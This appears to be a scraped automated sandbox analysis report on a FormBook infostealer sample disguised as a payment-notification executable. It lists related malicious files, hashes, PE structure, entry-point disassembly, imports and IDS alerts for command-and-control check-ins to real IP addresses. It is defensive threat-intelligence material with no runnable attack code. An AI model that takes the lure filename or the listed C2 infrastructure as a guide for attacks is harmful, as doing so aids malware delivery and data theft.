                                                                            • 15.197.193.217
                                                                            res.sh4.elfGet hashmaliciousUnknownBrowse
                                                                            • 128.88.223.198
                                                                            http://www.rebrand.ly/business-page-994/Get hashmaliciousUnknownBrowse
                                                                            • 15.197.137.111
                                                                            QsBdpe1gK5.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                            • 15.197.142.173
                                                                            n2pGr8w21V.exeGet hashmaliciousFormBookBrowse
                                                                            • 15.197.148.33
                                                                            http://www.lpb.gov.lrGet hashmaliciousCAPTCHA Scam ClickFixBrowse
                                                                            • 15.197.152.159
                                                                            https://red.travelglobeimmigration.comGet hashmaliciousUnknownBrowse
                                                                            • 15.197.240.20
                                                                            https://we.tl/t-fnebgmrnYQGet hashmaliciousUnknownBrowse
                                                                            • 15.197.193.217
                                                                            http://www.singhs.lvGet hashmaliciousCAPTCHA Scam ClickFixBrowse
                                                                            • 15.197.152.159
                                                                            NAMECHEAP-NETUSCSZ inquiry for MH raw material.exeGet hashmaliciousFormBookBrowse
                                                                            • 199.192.21.169
                                                                            1001-13.exeGet hashmaliciousFormBookBrowse
                                                                            • 162.0.236.169
                                                                            QsBdpe1gK5.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                            • 199.192.23.123
                                                                            rACq8Eaix6.exeGet hashmaliciousFormBookBrowse
                                                                            • 199.192.23.123
                                                                            plZuPtZoTk.exeGet hashmaliciousFormBookBrowse
                                                                            • 199.192.21.169
                                                                            5by4QM3v89.exeGet hashmaliciousFormBookBrowse
                                                                            • 199.192.23.123
                                                                            5CTbduoXq4.exeGet hashmaliciousFormBookBrowse
                                                                            • 63.250.43.134
                                                                            https://services221.com/mm/Get hashmaliciousHTMLPhisherBrowse
                                                                            • 198.54.116.108
                                                                            wWXR5js3k2.exeGet hashmaliciousFormBookBrowse
                                                                            • 63.250.43.134
                                                                            OVZizpEU7Q.exeGet hashmaliciousFormBookBrowse
                                                                            • 63.250.43.134
                                                                            No context
                                                                            No context
                                                                            Process:C:\Windows\SysWOW64\w32tm.exe
                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                            Category:dropped
                                                                            Size (bytes):114688
                                                                            Entropy (8bit):0.9746603542602881
                                                                            Encrypted:false
                                                                            SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                            MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                            SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                            SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                            SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                            Malicious:false
                                                                            Reputation:high, very likely benign file
                                                                            Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                            Process:C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):289280
                                                                            Entropy (8bit):7.994361421522106
                                                                            Encrypted:true
                                                                            SSDEEP:6144:aHiafm8BppDk1jvCnV35aitbYGbp31IyiL4TDPASfy4xC43zN3OQiJTX7d:UJm8ppc6nV355FY61Iy8yDPASfns4e9L
                                                                            MD5:4244C57DE65846CBC38A8579430776CF
                                                                            SHA1:A4CC6222B2CD4F856D19760BD45F196393176247
                                                                            SHA-256:9B77EE6D9A457BA5383BCA189944E5C7EA15A092B7ABA94269F7C538B62F2981
                                                                            SHA-512:40DCE4B68F3CD5C8F8F88DBDA9A6D5E4C2953F19C402BE8531417F25DD73DC7EE5A7FF94F49544C42F43F9EAFDEC56E15CD6049D468473721FB73DF2288ABBE2
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            Preview:...X;GHYC317..PY.GBGMAQW.TNX8GHYG317VXPY7GBGMAQWGTNX8GHYG317.XPY9X.IM.X.f.O..f.1.@.G$77+V*b$,/?83t,=.5=7gZ_....yZ(&"cL\]cTNX8GHY>28.k87..'%.p!6.]...'/.]...j87.-..q!6..=-0.'/.G317VXPYg.BG.@PW.C..8GHYG317.XRX<FIGM.UWGTNX8GHYg'17VHPY77FGMA.WGDNX8EHYA317VXPY1GBGMAQWG$JX8EHYG317TX..7GRGMQQWGT^X8WHYG317FXPY7GBGMAQWGTNX8GHYG317VXPY7GBGMAQWGTNX8GHYG317VXPY7GBGMAQWGTNX8GHYG317VXPY7GBGMAQWGTNX8GHYG317VXPY7GBGMAQWGTNX8GHYG317VXPY7GBGMAQWi + LGHYcd57VHPY7.FGMQQWGTNX8GHYG317vXP97GBGMAQWGTNX8GHYG317VXPY7GBGMAQWGTNX8GHYG317VXPY7GBGMAQWGTNX8GHYG317VXPY7GBGMAQWGTNX8GHYG317VXPY7GBGMAQWGTNX8GHYG317VXPY7GBGMAQWGTNX8GHYG317VXPY7GBGMAQWGTNX8GHYG317VXPY7GBGMAQWGTNX8GHYG317VXPY7GBGMAQWGTNX8GHYG317VXPY7GBGMAQWGTNX8GHYG317VXPY7GBGMAQWGTNX8GHYG317VXPY7GBGMAQWGTNX8GHYG317VXPY7GBGMAQWGTNX8GHYG317VXPY7GBGMAQWGTNX8GHYG317VXPY7GBGMAQWGTNX8GHYG317VXPY7GBGMAQWGTNX8GHYG317VXPY7GBGMAQWGTNX8GHYG317VXPY7GBGMAQWGTNX8GHYG317VXPY7GBGMAQWGTNX8GHYG317VXPY7GBGMAQWGTNX8GHYG317VXPY7GBGMAQWGTNX8GHYG317VXPY7GBGMAQWGTNX8GHYG317VXPY
                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                            Entropy (8bit):7.421928507256506
                                                                            TrID:
                                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                            File name:Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe
                                                                            File size:1'619'968 bytes
                                                                            MD5:24516ed0bcff1bb18dd58da6b6919c3e
                                                                            SHA1:760d5c65217102892caf3d6313ab3edc7a8548fa
                                                                            SHA256:3bc8146fb4903843798975abff071ddbe0b44769e5f6f8ed4850c17daf5c71c8
                                                                            SHA512:3caa4a6b69db0970670c33f120cee8748bb1c443fdc0cfc6a54fe0bf9ee82d331f546d9f578bea5914fcf9a36d7aee9fe2fd0f093a25cb7ddcbdf2f80311e4d5
                                                                            SSDEEP:24576:OqDEvCTbMWu7rQYlBQcBiT6rprG8aTQp4vJZmJLAwKyiJr7i90P/iy8o1s:OTvC/MTQYxsWR7aTQpsXwKlr7iKyx
                                                                            TLSH:C075D00273D1D062FFAB92334B5AF61157BC69260123E61F13A81DB9BE701B1563E7A3
                                                                            File Content Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......................j:......j:..C...j:......@.*...............................n.......~.............{.......{.......{.........z....
                                                                            Icon Hash:aaf3e3e3938382a0
                                                                            Entrypoint:0x420577
                                                                            Entrypoint Section:.text
                                                                            Digitally signed:false
                                                                            Imagebase:0x400000
                                                                            Subsystem:windows gui
                                                                            Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                            DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                            Time Stamp:0x67801F1C [Thu Jan 9 19:10:20 2025 UTC]
                                                                            TLS Callbacks:
                                                                            CLR (.Net) Version:
                                                                            OS Version Major:5
                                                                            OS Version Minor:1
                                                                            File Version Major:5
                                                                            File Version Minor:1
                                                                            Subsystem Version Major:5
                                                                            Subsystem Version Minor:1
                                                                            Import Hash:948cc502fe9226992dce9417f952fce3
                                                                            Instruction
                                                                            call 00007F2E753E3B93h
                                                                            jmp 00007F2E753E349Fh
                                                                            push ebp
                                                                            mov ebp, esp
                                                                            push esi
                                                                            push dword ptr [ebp+08h]
                                                                            mov esi, ecx
                                                                            call 00007F2E753E367Dh
                                                                            mov dword ptr [esi], 0049FDF0h
                                                                            mov eax, esi
                                                                            pop esi
                                                                            pop ebp
                                                                            retn 0004h
                                                                            and dword ptr [ecx+04h], 00000000h
                                                                            mov eax, ecx
                                                                            and dword ptr [ecx+08h], 00000000h
                                                                            mov dword ptr [ecx+04h], 0049FDF8h
                                                                            mov dword ptr [ecx], 0049FDF0h
                                                                            ret
                                                                            push ebp
                                                                            mov ebp, esp
                                                                            push esi
                                                                            push dword ptr [ebp+08h]
                                                                            mov esi, ecx
                                                                            call 00007F2E753E364Ah
                                                                            mov dword ptr [esi], 0049FE0Ch
                                                                            mov eax, esi
                                                                            pop esi
                                                                            pop ebp
                                                                            retn 0004h
                                                                            and dword ptr [ecx+04h], 00000000h
                                                                            mov eax, ecx
                                                                            and dword ptr [ecx+08h], 00000000h
                                                                            mov dword ptr [ecx+04h], 0049FE14h
                                                                            mov dword ptr [ecx], 0049FE0Ch
                                                                            ret
                                                                            push ebp
                                                                            mov ebp, esp
                                                                            push esi
                                                                            mov esi, ecx
                                                                            lea eax, dword ptr [esi+04h]
                                                                            mov dword ptr [esi], 0049FDD0h
                                                                            and dword ptr [eax], 00000000h
                                                                            and dword ptr [eax+04h], 00000000h
                                                                            push eax
                                                                            mov eax, dword ptr [ebp+08h]
                                                                            add eax, 04h
                                                                            push eax
                                                                            call 00007F2E753E623Dh
                                                                            pop ecx
                                                                            pop ecx
                                                                            mov eax, esi
                                                                            pop esi
                                                                            pop ebp
                                                                            retn 0004h
                                                                            lea eax, dword ptr [ecx+04h]
                                                                            mov dword ptr [ecx], 0049FDD0h
                                                                            push eax
                                                                            call 00007F2E753E6288h
                                                                            pop ecx
                                                                            ret
                                                                            push ebp
                                                                            mov ebp, esp
                                                                            push esi
                                                                            mov esi, ecx
                                                                            lea eax, dword ptr [esi+04h]
                                                                            mov dword ptr [esi], 0049FDD0h
                                                                            push eax
                                                                            call 00007F2E753E6271h
                                                                            test byte ptr [ebp+08h], 00000001h
                                                                            pop ecx
                                                                            Programming Language:
                                                                            • [ C ] VS2008 SP1 build 30729
                                                                            • [IMP] VS2008 SP1 build 30729
                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0xc8e640x17c.rdata
                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0xd40000xb4d50.rsrc
                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x1890000x7594.reloc
                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0xb0ff00x1c.rdata
                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_TLS0xc34000x18.rdata
                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xb10100x40.rdata
                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x9c0000x894.rdata
                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                            .text0x10000x9ab1d0x9ac000a1473f3064dcbc32ef93c5c8a90f3a6False0.565500681542811data6.668273581389308IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                            .rdata0x9c0000x2fb820x2fc00c9cf2468b60bf4f80f136ed54b3989fbFalse0.35289185209424084data5.691811547483722IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                            .data0xcc0000x706c0x480053b9025d545d65e23295e30afdbd16d9False0.04356553819444445DOS executable (block device driver @\273\)0.5846666986982398IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                            .rsrc0xd40000xb4d500xb4e00eeb309fc42a2ddd95e87d35f0677bbbeFalse0.9638975574464409data7.962981146145774IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                            .reloc0x1890000x75940x7600c68ee8931a32d45eb82dc450ee40efc3False0.7628111758474576data6.7972128181359786IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                            RT_ICON0xd45a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                                            RT_ICON0xd46d00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                                            RT_ICON0xd47f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                                            RT_ICON0xd49200x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                                                                            RT_ICON0xd4c080x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                                                                            RT_ICON0xd4d300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                                                                            RT_ICON0xd5bd80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                                                                            RT_ICON0xd64800x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                                                                            RT_ICON0xd69e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                                                                            RT_ICON0xd8f900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                                                                            RT_ICON0xda0380x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                                                                            RT_MENU0xda4a00x50dataEnglishGreat Britain0.9
                                                                            RT_STRING0xda4f00x594dataEnglishGreat Britain0.3333333333333333
                                                                            RT_STRING0xdaa840x68adataEnglishGreat Britain0.2735961768219833
                                                                            RT_STRING0xdb1100x490dataEnglishGreat Britain0.3715753424657534
                                                                            RT_STRING0xdb5a00x5fcdataEnglishGreat Britain0.3087467362924282
                                                                            RT_STRING0xdbb9c0x65cdataEnglishGreat Britain0.34336609336609336
                                                                            RT_STRING0xdc1f80x466dataEnglishGreat Britain0.3605683836589698
                                                                            RT_STRING0xdc6600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                                                            RT_RCDATA0xdc7b80xac018data1.0003136816287599
                                                                            RT_GROUP_ICON0x1887d00x76dataEnglishGreat Britain0.6610169491525424
                                                                            RT_GROUP_ICON0x1888480x14dataEnglishGreat Britain1.25
                                                                            RT_GROUP_ICON0x18885c0x14dataEnglishGreat Britain1.15
                                                                            RT_GROUP_ICON0x1888700x14dataEnglishGreat Britain1.25
                                                                            RT_VERSION0x1888840xdcdataEnglishGreat Britain0.6181818181818182
                                                                            RT_MANIFEST0x1889600x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823
                                                                            DLLImport
                                                                            WSOCK32.dllgethostbyname, recv, send, socket, inet_ntoa, setsockopt, ntohs, WSACleanup, WSAStartup, sendto, htons, __WSAFDIsSet, select, accept, listen, bind, inet_addr, ioctlsocket, recvfrom, WSAGetLastError, closesocket, gethostname, connect
                                                                            VERSION.dllGetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
                                                                            WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                                            COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                                                                            MPR.dllWNetGetConnectionW, WNetCancelConnection2W, WNetUseConnectionW, WNetAddConnection2W
                                                                            WININET.dllHttpOpenRequestW, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, InternetConnectW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetQueryDataAvailable
                                                                            PSAPI.DLLGetProcessMemoryInfo
                                                                            IPHLPAPI.DLLIcmpSendEcho, IcmpCloseHandle, IcmpCreateFile
                                                                            USERENV.dllDestroyEnvironmentBlock, LoadUserProfileW, CreateEnvironmentBlock, UnloadUserProfile
                                                                            UxTheme.dllIsThemeActive
                                                                            KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetShortPathNameW, DeleteFileW, IsDebuggerPresent, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, LoadResource, LockResource, SizeofResource, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, LoadLibraryW, GetLocalTime, CompareStringW, GetCurrentThread, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, VirtualAlloc, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, ResetEvent, WaitForSingleObjectEx, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, CloseHandle, GetFullPathNameW, GetStartupInfoW, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, SetLastError, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, ResumeThread, FreeLibraryAndExitThread, GetACP, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetStringTypeW, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, ReadConsoleW, GetTimeZoneInformation, FindFirstFileExW, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, SetCurrentDirectoryW, FindNextFileW, WriteConsoleW
                                                                            USER32.dllGetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, PeekMessageW, GetInputState, UnregisterHotKey, CharLowerBuffW, MonitorFromPoint, MonitorFromRect, LoadImageW, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, ClientToScreen, GetCursorPos, DeleteMenu, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, LockWindowUpdate, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, RegisterHotKey, GetCursorInfo, SetWindowPos, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, TrackPopupMenuEx, GetMessageW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, DispatchMessageW, keybd_event, TranslateMessage, ScreenToClient
                                                                            GDI32.dllEndPath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, GetDeviceCaps, SetPixel, CloseFigure, LineTo, AngleArc, MoveToEx, Ellipse, CreateCompatibleBitmap, CreateCompatibleDC, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, SelectObject, StretchBlt, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, GetDIBits, StrokePath
                                                                            COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                                                                            ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, RegCreateKeyExW, GetSecurityDescriptorDacl, GetAclInformation, GetUserNameW, AddAce, SetSecurityDescriptorDacl, InitiateSystemShutdownExW
                                                                            SHELL32.dllDragFinish, DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW
                                                                            ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
                                                                            OLEAUT32.dllCreateStdDispatch, CreateDispTypeInfo, UnRegisterTypeLib, UnRegisterTypeLibForUser, RegisterTypeLibForUser, RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, VariantChangeType, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysStringLen, QueryPathOfRegTypeLib, SysAllocString, VariantInit, VariantClear, DispCallFunc, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, SafeArrayDestroyDescriptor, VariantCopy, OleLoadPicture
                                                                            Language of compilation systemCountry where language is spokenMap
                                                                            EnglishGreat Britain
                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                            2025-01-13T10:19:31.792823+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.449736199.59.243.22880TCP
                                                                            2025-01-13T10:19:31.792823+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.449736199.59.243.22880TCP
                                                                            2025-01-13T10:19:55.501146+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449779104.21.13.14180TCP
                                                                            2025-01-13T10:19:58.027663+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449795104.21.13.14180TCP
                                                                            2025-01-13T10:20:00.595689+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449812104.21.13.14180TCP
                                                                            2025-01-13T10:20:03.318941+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.449832104.21.13.14180TCP
                                                                            2025-01-13T10:20:03.318941+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.449832104.21.13.14180TCP
                                                                            2025-01-13T10:20:10.033463+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44986815.197.240.2080TCP
                                                                            2025-01-13T10:20:11.527719+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44988415.197.240.2080TCP
                                                                            2025-01-13T10:20:15.114687+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44989615.197.240.2080TCP
                                                                            2025-01-13T10:20:17.601041+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.44991615.197.240.2080TCP
                                                                            2025-01-13T10:20:17.601041+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.44991615.197.240.2080TCP
                                                                            2025-01-13T10:20:23.330918+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449957136.243.225.580TCP
                                                                            2025-01-13T10:20:25.888137+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449977136.243.225.580TCP
                                                                            2025-01-13T10:20:28.783179+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449994136.243.225.580TCP
                                                                            2025-01-13T10:20:31.291950+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.450010136.243.225.580TCP
                                                                            2025-01-13T10:20:31.291950+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.450010136.243.225.580TCP
                                                                            2025-01-13T10:20:36.981692+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450017104.21.18.17180TCP
                                                                            2025-01-13T10:20:39.553568+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450018104.21.18.17180TCP
                                                                            2025-01-13T10:20:42.087545+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450019104.21.18.17180TCP
                                                                            2025-01-13T10:20:44.644673+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.450020104.21.18.17180TCP
                                                                            2025-01-13T10:20:44.644673+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.450020104.21.18.17180TCP
                                                                            2025-01-13T10:20:50.329479+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450021199.192.21.16980TCP
                                                                            2025-01-13T10:20:52.838344+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450022199.192.21.16980TCP
